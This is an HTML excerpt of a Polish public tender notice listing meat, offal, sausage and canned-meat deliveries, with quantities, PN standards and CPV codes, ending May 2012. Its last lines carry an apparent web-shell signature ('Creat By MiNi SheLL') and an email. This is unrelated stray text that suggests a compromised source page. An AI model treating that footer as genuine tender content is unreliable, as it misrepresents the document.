<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sukcesywne dostawy mięsa, podrobów i wędlin wieprzowych oraz wołowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3: Sukcesywne dostawy mięsa, podrobów i wędlin wieprzowych oraz wołowych. 

1.mięso wieprzowe -  szynka surowa D 4-Mięso wieprzowe, elementy świeże, PN-86/A-82002-2700kg,
2.mięso wieprzowe klopsowe	Produkt mięsny, średnio rozdrobniony, niepodany obróbce termicznej, stosunek mięsa do tłuszczu 80/20, PN-A-82011-1800kg,
3.mięso wieprzowe łopatka bez kości	Mięso wieprzowe, elementy świeże, PN-86/A-82002-3400kg,
4.mięso wieprzowe gulaszowe-Produkt mięsny, średnio rozdrobniony, niepodany obróbce termicznej, stosunek mięsa do tłuszczu 50/50, PN-A-82011-4000kg,
5.mięso wieprzowe schab bez kości-Mięso wieprzowe, elementy świeże, PN-86/A-82002-900kg,
6.boczek wędzony bez kości płaty-Mięso wieprzowe, elementy świeże, wędzone, PN-A-82007-1200kg,
7.wędzonka bigosowa bez kości-Mięso wieprzowe, elementy świeże, wędzone, PN-A-82007-	1800kg,
8.słonina płaty-Świeża, PN-86/A-82002-1200kg,
9.mięso wołowe bez kości ekstra-Mięso wołowe elementy świeże, 
PN-88/A-82003-900kg,
10.mięso wołowe antrykot-	Mięso wołowe elementy świeże, PN-88/A-82003	-500kg,
11.mięso wołowe z kością - żebra-Mięso wołowe elementy świeże, 
PN-88/A-82003-900kg,
12.żołądki wieprzowe-Podroby świeże, PN-86/A-82004-2000kg,
13.ozory wieprzowe-Podroby świeże, PN-86/A-82004-1400kg,
14.serca wieprzowe-Podroby świeże, PN-86/A-82004-2300kg,
15.wątroba wieprzowa-Podroby świeże, PN-86/A-82004-	3000kg,
16.kiełbasa zwyczajna-Wędlina średnio rozdrobniona, PN-A-82007-	3200kg,
17.kiełbasa parówkowa-Wędlina homogenizowana, drobno rozdrobniona , parzona, 
PN-A-82007-2800kg,
18.kiełbasa biała parzona-Wędlina parzona, średnio rozdrobniona, 
PN-A-82007-2700kg,
19.kiełbasa mortadela-Wędlina homogenizowana, drobno rozdrobniona, parzona, 
PN-A-82007-2100kg,
20.Kiełbasa golonkowa parzona-Wędlina parzona, grubo rozdrobniona, 
PN-A-82007-700kg,
21.kiełbasa mielonka-Wędlina parzona, średnio rozdrobniona, PN-A-82007-2300kg,
22.Kiełbasa słoikowa-Wędlina parzona, średnio rozdrobniona, PN-A-82007-1500kg,
23.kiełbasa szynkowa mielona wieprzowa-Wędlina drobno rozdrobniona, parzona, PN-A-82007-1500kg,
24.serdelki śląskie	Wędlina drobno rozdrobniona, parzona, PN-A-82007-1200kg,
25.pieczeń wielkopolska-Wyrób średnio rozdrobniony, zapiekany, 
PN-A-82007-2100kg,
26.wątrobianka-Wędlina podrobowa, parzona, PN-A-82007-2800kg,
27.metka cebulowa-Wędlina drobno rozdrobniona,-PN-A-82007-2400kg,
28.salceson czarny	-Wędlina podrobowa, parzona,PN-A-82007-1500kg,
29.kaszanka-Wędlina podrobowa , parzona, PN-A-82007-	4300kg,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.11.10.00-9, 15.11.30.00-3, 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Sukcesywne dostawy konserw mięsnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4: Sukcesywne dostawy konserw mięsnych. 

1.konserwa pasztet z indykiem -Zawartość mięsa z indyka min. 10%; Opakowanie jednostkowe o pojemności około 300 g; z samootwieraczem-1300kg,
2.konserwa pasztet z gęsią-	Zawartość mięsa z gęsi min. 10%; Opakowanie jednostkowe o pojemności około 300 g; z samootwieraczem-1500kg,
3.konserwa wołowa-Skład; mięso wołowe min. 69%; Opakowanie jednostkowe o pojemności około 300 g; z samootwieraczem-1000kg,
4.konserwa mięsna wieprzowa-typu tyrolska lub produkt równoważny; opakowanie jednostkowe o pojemności około 300g ; z samootwieraczem-1000kg,
5.konserwa mięsna wieprzowa-typu tyrolska lub produkt równoważny; opakowanie jednostkowe o pojemności od 100-140g ; AluPack; z samootwieraczem-300kg,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.10.00-5, 15.13.13.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com